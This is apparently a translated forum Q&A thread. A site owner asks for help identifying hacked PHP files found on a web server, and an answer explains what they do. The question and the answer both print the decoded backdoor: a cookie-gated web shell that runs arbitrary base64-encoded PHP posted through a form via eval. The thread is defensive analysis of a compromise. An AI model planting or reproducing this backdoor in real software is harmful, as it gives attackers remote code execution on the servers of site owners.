[英]PHP hack files found - help decoding and identifying
我在我们的 web 服务器上发现了一些黑客文件。 我设法对它们进行了一些去混淆——它们似乎都有一个部分可以解码成一个看起来像这样的块:
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}
但是这个块(上面解码的)通常嵌入到更大的代码片段中。 我在这里完整地分享了其中一个文件的代码: http://pastie.org/3753704
我可以看出这段代码的去向,但绝对不是 PHP 的专家,可以使用一些帮助来更具体地弄清楚它在做什么或启用什么。 此外,如果有人碰巧熟悉这个 hack,任何关于它如何工作以及 hack 的后门和其他组件可能隐藏在哪里的信息都将非常有用并且非常感谢。
我试着用谷歌搜索部分代码,看看是否有其他人报告过它,但只找到了这个链接: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla
谢谢!
如果 cookie“v”设置为“d”,则在表单中显示文本区域。 提交表单时,执行textarea中的代码。
<?php
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){
if (!empty($_POST['c'])) {
echo '<textarea rows=28 cols=80>';
$d=base64_decode(str_replace(' ','+',$_POST['c']));
if($d)
@eval($d);
echo '</textarea>';
}
echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';
exit;
}
?>
不是这个特定的 hack,但这篇文章中的一些建议可能会有所帮助。 具体来说,访问日志可能会向您显示问题的来源。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.